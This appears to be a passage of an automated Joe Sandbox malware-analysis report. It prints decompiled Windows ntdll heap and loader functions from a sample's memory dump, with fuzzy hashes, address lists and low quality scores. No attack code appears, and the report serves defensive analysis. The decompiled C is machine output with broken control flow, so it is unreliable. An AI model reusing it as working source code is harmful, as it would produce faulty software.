                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                    • API String ID: 3446177414-1102453626
                                                    • Opcode ID: 19ad5a38e1cfe991f4bd34112b82debd5080f5d3bf3bcd1acd0432045591b253
                                                    • Instruction ID: 69ad62723214f8ce1bb1e4b7f28b0c7638bf093dd63cf987a1378d20441727fd
                                                    • Opcode Fuzzy Hash: 19ad5a38e1cfe991f4bd34112b82debd5080f5d3bf3bcd1acd0432045591b253
                                                    • Instruction Fuzzy Hash: C4419275A00229EFC706DF1DC484A6A7BB6FF49756716826DE40C9B261D731EC42CBC2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7BDAC0 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 84timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 30%
                                                    			E1D7BDAC0(void* __ecx, intOrPtr _a4) {
				char _v5;
				intOrPtr* _t25;
				char* _t26;
				char _t28;
				intOrPtr _t53;
				intOrPtr* _t55;

				_t53 = _a4;
				_v5 = 0xff;
				if( *((intOrPtr*)(_t53 + 8)) == 0xddeeddee) {
					E1D859109(_t53,  &_v5);
					L5:
					_t25 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
					if(_t25 != 0) {
						if( *_t25 == 0) {
							goto L6;
						}
						_t26 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						L7:
						if( *_t26 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
								E1D84F2AE(_t53);
							}
						}
						_t28 = 1;
						L9:
						return _t28;
					}
					L6:
					_t26 = 0x7ffe0380;
					goto L7;
				}
				if(( *(_t53 + 0x44) & 0x01000000) != 0) {
					_t55 =  *0x1d883768; // 0x0
					 *0x1d8891e0(_t53);
					_t28 =  *_t55();
					goto L9;
				}
				if( *((intOrPtr*)(_t53 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E1D78B910();
					} else {
						E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E1D78B910("Invalid heap signature for heap at %p", _t53);
					E1D78B910(", passed to %s", "RtlLockHeap");
					_push("\n");
					E1D78B910();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1d8847a1 = 1;
						asm("int3");
						 *0x1d8847a1 = 0;
					}
					_t28 = 0;
					goto L9;
				} else {
					if(( *(_t53 + 0x40) & 0x00000001) == 0) {
						E1D79FED0( *((intOrPtr*)(_t53 + 0xc8)));
						 *((short*)(_t53 + 0xe8)) =  *((short*)(_t53 + 0xe8)) + 1;
					}
					goto L5;
				}
			}









                                                    0x1d7bdac8
                                                    0x1d7bdacb
                                                    0x1d7bdad6
                                                    0x1d7ff54e
                                                    0x1d7bdb0e
                                                    0x1d7bdb14
                                                    0x1d7bdb19
                                                    0x1d7ff5ee
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7ff5fd
                                                    0x1d7bdb24
                                                    0x1d7bdb27
                                                    0x1d7ff614
                                                    0x1d7ff61c
                                                    0x1d7ff61c
                                                    0x1d7ff614
                                                    0x1d7bdb2d
                                                    0x1d7bdb2f
                                                    0x1d7bdb31
                                                    0x1d7bdb31
                                                    0x1d7bdb1f
                                                    0x1d7bdb1f
                                                    0x00000000
                                                    0x1d7bdb1f
                                                    0x1d7bdae3
                                                    0x1d7ff559
                                                    0x1d7ff561
                                                    0x1d7ff567
                                                    0x00000000
                                                    0x1d7ff567
                                                    0x1d7bdaf0
                                                    0x1d7ff578
                                                    0x1d7ff597
                                                    0x1d7ff59c
                                                    0x1d7ff57a
                                                    0x1d7ff58f
                                                    0x1d7ff594
                                                    0x1d7ff5a8
                                                    0x1d7ff5b7
                                                    0x1d7ff5bc
                                                    0x1d7ff5c1
                                                    0x1d7ff5d3
                                                    0x1d7ff5d5
                                                    0x1d7ff5dc
                                                    0x1d7ff5dd
                                                    0x1d7ff5dd
                                                    0x1d7ff5e4
                                                    0x00000000
                                                    0x1d7bdaf6
                                                    0x1d7bdafa
                                                    0x1d7bdb02
                                                    0x1d7bdb07
                                                    0x1d7bdb07
                                                    0x00000000
                                                    0x1d7bdafa

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                    • API String ID: 3446177414-1222099010
                                                    • Opcode ID: 35bd7613f23768a128b0456c339b7da344a74cbb982577df82324e7d601d45a7
                                                    • Instruction ID: b2dab8860ee008462fb5896ca4a3012faa44d1ce9dd100c9347ccb87f706a7ec
                                                    • Opcode Fuzzy Hash: 35bd7613f23768a128b0456c339b7da344a74cbb982577df82324e7d601d45a7
                                                    • Instruction Fuzzy Hash: F83169365086C4DFD722CB1CC809FAAB7A4FB01B70F004486E81647762DB69A944CA63
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D799046 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E1D799046(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				short _t95;
				intOrPtr _t110;
				short _t118;
				signed int _t131;
				intOrPtr _t136;
				intOrPtr _t140;
				intOrPtr _t146;
				intOrPtr* _t148;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr* _t154;
				void* _t156;

				_t141 = __edx;
				_push(0x154);
				_push(0x1d86be98);
				E1D7E7C40(__ebx, __edi, __esi);
				 *(_t156 - 0xf0) = __edx;
				_t151 = __ecx;
				 *((intOrPtr*)(_t156 - 0xfc)) = __ecx;
				 *((intOrPtr*)(_t156 - 0xf8)) =  *((intOrPtr*)(_t156 + 8));
				 *((intOrPtr*)(_t156 - 0xe8)) =  *((intOrPtr*)(_t156 + 0xc));
				 *((intOrPtr*)(_t156 - 0xf4)) =  *((intOrPtr*)(_t156 + 0x10));
				 *((intOrPtr*)(_t156 - 0xe4)) = 0;
				 *((short*)(_t156 - 0xda)) = 0;
				 *(_t156 - 0xe0) = 0;
				 *((intOrPtr*)(_t156 - 0x140)) = 0x40;
				E1D7D8F40(_t156 - 0x13c, 0, 0x3c);
				 *((intOrPtr*)(_t156 - 0x164)) = 0x24;
				 *((intOrPtr*)(_t156 - 0x160)) = 1;
				_t131 = 7;
				memset(_t156 - 0x15c, 0, _t131 << 2);
				_t146 =  *((intOrPtr*)(_t156 - 0xe8));
				_t152 = E1D7A9870(1, _t151, 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
				if(_t152 >= 0) {
					if( *0x1d8865e0 == 0 || ( *(_t156 - 0xe0) & 0x00000001) != 0) {
						goto L1;
					} else {
						_t152 = E1D7AA170(7, 0, 2,  *((intOrPtr*)(_t156 - 0xfc)), _t156 - 0x140);
						if(_t152 < 0) {
							goto L1;
						}
						if( *((intOrPtr*)(_t156 - 0x13c)) != 1) {
							L11:
							_t152 = 0xc0150005;
							goto L1;
						}
						if(( *(_t156 - 0x118) & 0x00000001) == 0) {
							if(( *(_t156 - 0x118) & 0x00000002) != 0) {
								 *(_t156 - 0x120) = 0xfffffffc;
							}
						} else {
							 *(_t156 - 0x120) =  *(_t156 - 0x120) & 0x00000000;
						}
						_t136 =  *((intOrPtr*)(_t156 - 0x114));
						_t95 =  *((intOrPtr*)(_t136 + 0x5c));
						 *((short*)(_t156 - 0xda)) = _t95;
						 *((short*)(_t156 - 0xdc)) = _t95;
						 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t136 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
						 *((intOrPtr*)(_t156 - 0xe8)) = _t156 - 0xd0;
						 *((short*)(_t156 - 0xea)) = 0xaa;
						_t152 = E1D7B5A40(_t141,  *(_t156 - 0xf0) & 0x0000ffff, _t156 - 0xec, 2, 0);
						if(_t152 < 0 || E1D7B04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
							goto L1;
						} else {
							_t154 =  *0x1d8865e0; // 0x75f3a680
							 *0x1d8891e0( *(_t156 - 0x120),  *(_t156 - 0xf0), _t156 - 0xe4);
							_t152 =  *_t154();
							 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
							if(_t152 < 0) {
								goto L1;
							} else {
								_t110 =  *((intOrPtr*)(_t156 - 0xe4));
								if(_t110 == 0xffffffff) {
									L26:
									 *((intOrPtr*)(_t156 - 4)) = 1;
									_t148 =  *0x1d8865e8;
									if(_t148 != 0) {
										 *0x1d8891e0(_t110);
										 *_t148();
									}
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									goto L1;
								}
								E1D7ADC40(_t156 - 0x164, _t110);
								 *((intOrPtr*)(_t156 - 4)) = 0;
								if( *((intOrPtr*)(_t146 + 4)) != 0) {
									E1D7A3B90(_t146);
								}
								_t149 =  *((intOrPtr*)(_t156 - 0xfc));
								_t152 = E1D7A9870(0,  *((intOrPtr*)(_t156 - 0xfc)), 0,  *((intOrPtr*)(_t156 - 0xf8)), _t146,  *((intOrPtr*)(_t156 - 0xf4)), _t156 - 0xe0, 0, 0);
								 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
								if(_t152 < 0) {
									L25:
									 *((intOrPtr*)(_t156 - 4)) = 0xfffffffe;
									_t110 = E1D7F247B();
									goto L26;
								} else {
									_t152 = E1D7AA170(7, 0, 2, _t149, _t156 - 0x140);
									 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
									if(_t152 < 0) {
										goto L25;
									}
									if( *((intOrPtr*)(_t156 - 0x13c)) == 1) {
										_t140 =  *((intOrPtr*)(_t156 - 0x114));
										_t118 =  *((intOrPtr*)(_t140 + 0x5c));
										 *((short*)(_t156 - 0xda)) = _t118;
										 *((short*)(_t156 - 0xdc)) = _t118;
										 *((intOrPtr*)(_t156 - 0xd8)) =  *((intOrPtr*)(_t140 + 0x60)) +  *((intOrPtr*)(_t156 - 0x110));
										if(E1D7B04C0(_t156 - 0xdc, _t156 - 0xec, 1) == 0) {
											goto L25;
										}
										_t152 = 0xc0150004;
										L24:
										 *((intOrPtr*)(_t156 - 0xd4)) = _t152;
										goto L25;
									}
									_t152 = 0xc0150005;
									goto L24;
								}
							}
							goto L11;
						}
					}
				}
				L1:
				 *[fs:0x0] =  *((intOrPtr*)(_t156 - 0x10));
				return _t152;
			}















                                                    0x1d799046
                                                    0x1d799046
                                                    0x1d79904b
                                                    0x1d799050
                                                    0x1d799055
                                                    0x1d79905b
                                                    0x1d79905d
                                                    0x1d799066
                                                    0x1d79906f
                                                    0x1d799078
                                                    0x1d799080
                                                    0x1d799088
                                                    0x1d79908f
                                                    0x1d799095
                                                    0x1d7990a9
                                                    0x1d7990b1
                                                    0x1d7990be
                                                    0x1d7990c6
                                                    0x1d7990cf
                                                    0x1d7990e2
                                                    0x1d7990f7
                                                    0x1d7990fb
                                                    0x1d799118
                                                    0x00000000
                                                    0x1d799123
                                                    0x1d79913b
                                                    0x1d79913f
                                                    0x00000000
                                                    0x00000000
                                                    0x1d799147
                                                    0x1d7f231f
                                                    0x1d7f231f
                                                    0x00000000
                                                    0x1d7f231f
                                                    0x1d799154
                                                    0x1d7f2330
                                                    0x1d7f2336
                                                    0x1d7f2336
                                                    0x1d79915a
                                                    0x1d79915a
                                                    0x1d79915a
                                                    0x1d799161
                                                    0x1d799167
                                                    0x1d79916b
                                                    0x1d799172
                                                    0x1d799182
                                                    0x1d79918e
                                                    0x1d799199
                                                    0x1d7991ba
                                                    0x1d7991be
                                                    0x00000000
                                                    0x1d7991e0
                                                    0x1d7f2358
                                                    0x1d7f2360
                                                    0x1d7f2368
                                                    0x1d7f236a
                                                    0x1d7f2372
                                                    0x00000000
                                                    0x1d7f2378
                                                    0x1d7f2378
                                                    0x1d7f2381
                                                    0x1d7f2458
                                                    0x1d7f2458
                                                    0x1d7f245b
                                                    0x1d7f2463
                                                    0x1d7f2468
                                                    0x1d7f246e
                                                    0x1d7f246e
                                                    0x1d7f24a7
                                                    0x00000000
                                                    0x1d7f24a7
                                                    0x1d7f238f
                                                    0x1d7f2396
                                                    0x1d7f239c
                                                    0x1d7f239f
                                                    0x1d7f239f
                                                    0x1d7f23bb
                                                    0x1d7f23c8
                                                    0x1d7f23ca
                                                    0x1d7f23d2
                                                    0x1d7f244c
                                                    0x1d7f244c
                                                    0x1d7f2453
                                                    0x00000000
                                                    0x1d7f23d4
                                                    0x1d7f23e7
                                                    0x1d7f23e9
                                                    0x1d7f23f1
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f23f9
                                                    0x1d7f2402
                                                    0x1d7f2408
                                                    0x1d7f240c
                                                    0x1d7f2413
                                                    0x1d7f2423
                                                    0x1d7f243f
                                                    0x00000000
                                                    0x00000000
                                                    0x1d7f2441
                                                    0x1d7f2446
                                                    0x1d7f2446
                                                    0x00000000
                                                    0x1d7f2446
                                                    0x1d7f23fb
                                                    0x00000000
                                                    0x1d7f23fb
                                                    0x1d7f23d2
                                                    0x00000000
                                                    0x1d7f2372
                                                    0x1d7991be
                                                    0x1d799118
                                                    0x1d7990fd
                                                    0x1d799102
                                                    0x1d79910e

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: DebugPrintTimes
                                                    • String ID: $$@
                                                    • API String ID: 3446177414-1194432280
                                                    • Opcode ID: 7b9b5dbee3f52fc4313b4da987ee4ec31fa9ce0a00e8ea2c91969f6d9fe9c5a7
                                                    • Instruction ID: 67416d35776b1f1c6a532ced610f2722f729dea6c1641d5cf314fcf1b90b3cc3
                                                    • Opcode Fuzzy Hash: 7b9b5dbee3f52fc4313b4da987ee4ec31fa9ce0a00e8ea2c91969f6d9fe9c5a7
                                                    • Instruction Fuzzy Hash: D8813D76D042699BDB35CF54CC85BEEB6B8AF08720F0141DAE919B7250E7709E84CF62
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D7B237A Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 35%
                                                    			E1D7B237A(intOrPtr* __ecx, void* __edx) {
				char _v8;
				signed int _v12;
				intOrPtr* _v16;
				void* __ebx;
				intOrPtr _t22;
				intOrPtr _t29;
				signed int _t30;
				signed char _t36;
				intOrPtr _t38;
				intOrPtr* _t42;
				void* _t45;
				void* _t48;
				signed int _t50;
				intOrPtr* _t51;
				signed int _t53;
				signed int _t55;
				void* _t59;

				_t38 =  *0x1d8838b8; // 0x1
				_t50 = 0;
				_v16 = __ecx;
				_v12 = 0;
				_t55 = 0;
				if(_t38 == 0) {
					L2:
					if(_t38 == 1) {
						_t22 =  *0x1d8868d8; // 0x0
						if(_t22 != 0) {
							E1D7A3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50, _t22);
							 *0x1d8868d8 = _t50;
							 *0x1d885d4c = _t50;
						}
					}
					 *0x1d8838b8 = _t38;
					return _t55;
				}
				_t59 =  *0x1d8868d8 - _t55; // 0x0
				if(_t59 != 0) {
					 *0x1d8838b8 = 0;
					_t55 = E1D811BB6(_t38,  &_v8);
					if(_t55 >= 0) {
						_t51 =  *0x1d8868d8; // 0x0
						while( *_t51 != 0) {
							 *0x1d8891e0(_t51, 0, 1, 1, 0, 1, 0x10);
							_v8();
							if(0 == 0) {
								_t55 = 0xc0000142;
								L21:
								_t50 = 0;
								goto L2;
							}
							_t42 = _t51;
							_t10 = _t42 + 2; // 0x2
							_t48 = _t10;
							do {
								_t29 =  *_t42;
								_t42 = _t42 + 2;
							} while (_t29 != _v12);
							_t51 = _t51 + (_t42 - _t48 >> 1) * 2 + 2;
						}
						_t30 =  *0x7ffe0330;
						_t53 =  *0x1d889218; // 0x0
						_v12 = _t30;
						_t45 = 0x20;
						_t46 = _t45 - (_t30 & 0x0000001f);
						asm("ror edi, cl");
						E1D79FED0(0x1d8832d8);
						if( *0x1d8865f4 < 3) {
							_t46 = _v16;
							if(( *( *_v16 - 0x20) & 0x00000800) == 0) {
								E1D786704(_t46, _t53 ^ _v12);
							}
						}
						_push(0x1d8832d8);
						E1D79E740(_t46);
						goto L21;
					}
					_t36 =  *0x1d8837c0; // 0x0
					if((_t36 & 0x00000003) != 0) {
						E1D80E692("minkernel\\ntdll\\ldrinit.c", 0xba1, "LdrpDynamicShimModule", 0, "Getting ApphelpCheckModule failed with status 0x%08lx\n", _t55);
						_t36 =  *0x1d8837c0; // 0x0
					}
					if((_t36 & 0x00000010) != 0) {
						asm("int3");
					}
					_t55 = _t50;
				}
				goto L2;
			}




















                                                    0x1d7b2383
                                                    0x1d7b238b
                                                    0x1d7b238d
                                                    0x1d7b2390
                                                    0x1d7b2393
                                                    0x1d7b2397
                                                    0x1d7b23a5
                                                    0x1d7b23a8
                                                    0x1d7b23aa
                                                    0x1d7b23b1
                                                    0x1d7fa878
                                                    0x1d7fa87d
                                                    0x1d7fa883
                                                    0x1d7fa883
                                                    0x1d7b23b1
                                                    0x1d7b23ba
                                                    0x1d7b23c3
                                                    0x1d7b23c3
                                                    0x1d7b2399
                                                    0x1d7b239f
                                                    0x1d7fa784
                                                    0x1d7fa78f
                                                    0x1d7fa793
                                                    0x1d7fa7cd
                                                    0x1d7fa80b
                                                    0x1d7fa7e3
                                                    0x1d7fa7e9
                                                    0x1d7fa7ee
                                                    0x1d7fa866
                                                    0x1d7fa85f
                                                    0x1d7fa85f
                                                    0x00000000
                                                    0x1d7fa85f
                                                    0x1d7fa7f0
                                                    0x1d7fa7f2
                                                    0x1d7fa7f2
                                                    0x1d7fa7f5
                                                    0x1d7fa7f5
                                                    0x1d7fa7f8
                                                    0x1d7fa7fb
                                                    0x1d7fa808
                                                    0x1d7fa808
                                                    0x1d7fa812
                                                    0x1d7fa817
                                                    0x1d7fa81f
                                                    0x1d7fa825
                                                    0x1d7fa826
                                                    0x1d7fa82d
                                                    0x1d7fa82f
                                                    0x1d7fa83b
                                                    0x1d7fa83d
                                                    0x1d7fa849
                                                    0x1d7fa850
                                                    0x1d7fa850
                                                    0x1d7fa849
                                                    0x1d7fa855
                                                    0x1d7fa85a
                                                    0x00000000
                                                    0x1d7fa85a
                                                    0x1d7fa795
                                                    0x1d7fa79c
                                                    0x1d7fa7b4
                                                    0x1d7fa7b9
                                                    0x1d7fa7be
                                                    0x1d7fa7c3
                                                    0x1d7fa7c5
                                                    0x1d7fa7c5
                                                    0x1d7fa7c6
                                                    0x1d7fa7c6
                                                    0x00000000

                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 1D7FA7AF
                                                    • LdrpDynamicShimModule, xrefs: 1D7FA7A5
                                                    • apphelp.dll, xrefs: 1D7B2382
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 1D7FA79F
                                                    Memory Dump Source
                                                    • Source File: 00000005.00000002.44191646427.000000001D760000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D760000, based on PE: true
                                                    • Associated: 00000005.00000002.44194108947.000000001D889000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000005.00000002.44194181907.000000001D88D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_5_2_1d760000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 1cca5d1f7ccc58e7764ed98f1729c589201a9c718c764321a33b79afb7c11596
                                                    • Instruction ID: e02fa7e48d71381ede1bd347732d503545c389cc73bc12a93f8f97a4526ade82
                                                    • Opcode Fuzzy Hash: 1cca5d1f7ccc58e7764ed98f1729c589201a9c718c764321a33b79afb7c11596
                                                    • Instruction Fuzzy Hash: B0318A36A00150EFD722AF5DC8C4F6E77B4FB88B74F15402AE914AB361D7B0A841CB52
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 1D78F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 65%
                                                    			E1D78F8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x1d88b370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x1d886960 - 2;
					if( *0x1d886960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E1D78B910();
						} else {
							E1D78B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E1D78B910();
						__eflags =  *0x1d885da8;
						if(__eflags == 0) {
							_t139 = 2;
							E1D84FC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E1D7D4B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E1D8378DE(_t141, _t161, 0, 8, 0);
					}
					E1D78FD8E(_t161, _t158);
					E1D8502EC(_t161);
					_t158 = 1;
					E1D78918A(_t161, 1, 0, 0);
					E1D858E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x1d883758; // 0x0
					 *0x1d8891e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E1D8378DE(_t147, _t161, 0, 8, 0);
				}
				E1D78FD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E1D83F85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E1D79FED0(0x1d884800);
						E1D78FAEC(_t161);
						_push(0x1d884800);
						E1D79E740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E1D78FABA( &_v92,  &_v96, 0x8000);
							_t91 = E1D7A3C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E1D84DA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
							_t96 =  *((intOrPtr*)(_t161 + 0xe4));
						} else {
							_t96 = 0;
						}
						if(_t96 != 0) {
							 *(_t176 + 0x1c) = _t96;
							_t158 = _t176 + 0x1c;
							_v88 = 0;
							E1D78FABA(_t176 + 0x1c,  &_v88, 0x8000);
						}
						_t132 = _t161 + 0x88;
						if( *_t132 != 0) {
							 *((intOrPtr*)(_t176 + 0x24)) = 0;
							_t158 = _t132;
							E1D78FABA(_t132, _t176 + 0x24, 0x8000);
							 *_t132 = 0;
						}
						if(( *(_t161 + 0x40) & 0x00000001) == 0) {
							 *((intOrPtr*)(_t161 + 0xc8)) = 0;
						}
						goto L16;
						L16:
						_t169 =  *((intOrPtr*)(_t161 + 0xa8)) - 0x10;
						E1D78FA44(_t169);
						if(_t169 != _t161) {
							goto L16;
						} else {
							_t102 = E1D7A3C40();
							_t170 = 0x7ffe0380;
							if(_t102 != 0) {
								_t105 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t105 = 0x7ffe0380;
							}
							if( *_t105 != 0) {
								_t106 =  *[fs:0x30];
								__eflags =  *(_t106 + 0x240) & 0x00000001;
								if(( *(_t106 + 0x240) & 0x00000001) != 0) {
									_t121 = E1D7A3C40();
									__eflags = _t121;
									if(_t121 != 0) {
										_t170 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags = _t170;
									}
									 *((short*)(_t176 + 0x2a)) = 0x1023;
									_push(_t176 + 0x24);
									_push(4);
									_push(0x402);
									_push( *_t170 & 0x000000ff);
									 *(_t176 + 0x54) = _t161;
									E1D7D2F90();
								}
							}
							_t107 = E1D7A3C40();
							_t171 = 0x7ffe038a;
							if(_t107 != 0) {
								_t110 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t110 = 0x7ffe038a;
							}
							if( *_t110 != 0) {
								_t111 = E1D7A3C40();
								__eflags = _t111;
								if(_t111 != 0) {
									_t171 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									__eflags = _t171;
								}
								 *((short*)(_t176 + 0x4e)) = 0x1023;
								_push(_t176 + 0x48);
								_push(4);
								_push(0x402);
								_push( *_t171 & 0x000000ff);
								_v8 = _t161;
								E1D7D2F90();
							}
							if(E1D7A3C40() != 0) {
								_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							} else {
								_t118 = 0x7ffe0388;
							}
							if( *_t118 != 0) {
								E1D84D9C6(_t161);
							}
							goto L26;
						}
					}
				}
			}


















































                                                    0x1d78f8b0
                                                    0x1d78f8b8
                                                    0x1d78f8c2
                                                    0x1d78f8c6
                                                    0x1d78f8c9
                                                    0x1d78f8ce
                                                    0x1d7ee467
                                                    0x1d7ee46e
                                                    0x1d7ee474
                                                    0x1d7ee47a
                                                    0x1d7ee47e
                                                    0x1d7ee49d
                                                    0x1d7ee4a2
                                                    0x1d7ee480
                                                    0x1d7ee495
                                                    0x1d7ee49a
                                                    0x1d7ee4a8
                                                    0x1d7ee4ad
                                                    0x1d7ee4b2
                                                    0x1d7ee4ba
                                                    0x1d7ee4c2
                                                    0x1d7ee4c3
                                                    0x1d7ee4c3
                                                    0x1d7ee4ba
                                                    0x1d78f9f6
                                                    0x1d78f9f6
                                                    0x1d78f9f8
                                                    0x1d78f9fc
                                                    0x1d78f9fd
                                                    0x1d78f9fe
                                                    0x1d78fa09
                                                    0x1d78fa09
                                                    0x1d78f8db
                                                    0x1d7ee4cd
                                                    0x1d7ee4d3
